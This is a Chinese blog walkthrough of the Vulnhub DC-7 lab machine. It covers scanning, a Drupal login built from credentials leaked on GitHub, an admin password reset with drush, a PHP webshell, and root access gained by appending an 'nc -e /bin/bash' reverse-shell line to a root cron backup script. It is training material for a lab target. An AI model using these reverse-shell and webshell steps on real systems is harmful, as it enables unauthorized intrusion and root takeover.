0
点赞
收藏
分享

微信扫一扫

Vulnhub靶机DC系列-DC-7

Ewall_熊猫 2022-01-07 阅读 89

Vulnhub靶机DC系列-DC-7

靶场名称:DC-7
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
下载地址:

DC-7.zip (Size: 939 MB)
Download: http://www.five86.com/downloads/DC-7.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-7.zip.torrent (Magnet)

VMware->文件->打开->选中 .ova 文件,导入,会提示导入失败,点重试就完事了(双击.ova好像就直接导入了-_-)

打开DC靶机(网络适配器看一下是不是NAT模式,不然扫不出来)

kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-7靶机的网段

namp -sn x.x.x.x/x

在这里插入图片描述
靶机DC-7 IP:192.168.210.146
kali:192.168.210.137

nmap扫描一下靶机的端口信息、系统信息等等。

nmap -O -sV -p- 192.168.210.146

在这里插入图片描述
22、80端口开放
访问页面,CMS:Drupal8
在这里插入图片描述
dirb 扫描目录半天也没有什么有用信息,有一个robots.txt里面也没有什么有用信息。

在这里插入图片描述看看描述
在这里插入图片描述盒子里没有线索,从outside找线索,那就直接百度咯,百度什么呢

  • drupal8
  • @DC7USER

试试
GitHub里,有资源,看一下配置文件里有没有数据库账号密码
在这里插入图片描述在这里插入图片描述

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

在这里插入图片描述在这里插入图片描述ssh直接进去了
有9封邮件
在这里插入图片描述由内容可以知道这是root用户发给dc7user用户的一封邮箱,并且会以root权限定时执行/opt/scripts/backups.sh脚本。
在这里插入图片描述

cat /opt/scripts/backups.sh

在这里插入图片描述#!/bin/bash 由于bachups.sh脚本执行的是root权限,所以我们现在只要在脚本里写入反弹shell命令就能得到root权限的shell了
而www-data用户即网站用户具有对该脚本写入的权限,所以我们现在要拿到www-data用户的反弹shell

drush命令是drupal系统中特定的管理工具。可以修改www-data用户admin密码

drush命令:
https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell

修改admin用户密码为admin

drush user-password admin --password="admin"

在这里插入图片描述现在我们要拿网站的shell,看看能不能挂马

发现可以写入一个网页,但是网页类型没有PHP模式
在这里插入图片描述
所以需要下载一个PHP代码的插件即可。
php插件下载
https://www.drupal.org/project/php
https://ftp.drupal.org/files/projects/php-8.x-1.1.zip
https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
在这里插入图片描述在这里插入图片描述安装出错,可以试试另一个.tar.gz.

在这里插入图片描述写入一句话木马,蚁剑连接。或者直接反弹shell
在这里插入图片描述连接成功,在蚁剑反弹在这里插入图片描述
kali监听9999,python获得交互shell在这里插入图片描述

python -c "import pty; pty.spawn('/bin/bash')"

echo 'nc -e /bin/bash 192.168.210.137 8888' >> /opt/scripts/backups.sh

在这里插入图片描述
反弹shell写入成功。等定时任务执行即可自动连接。
在这里插入图片描述

靶机结束。

举报

相关推荐

0 条评论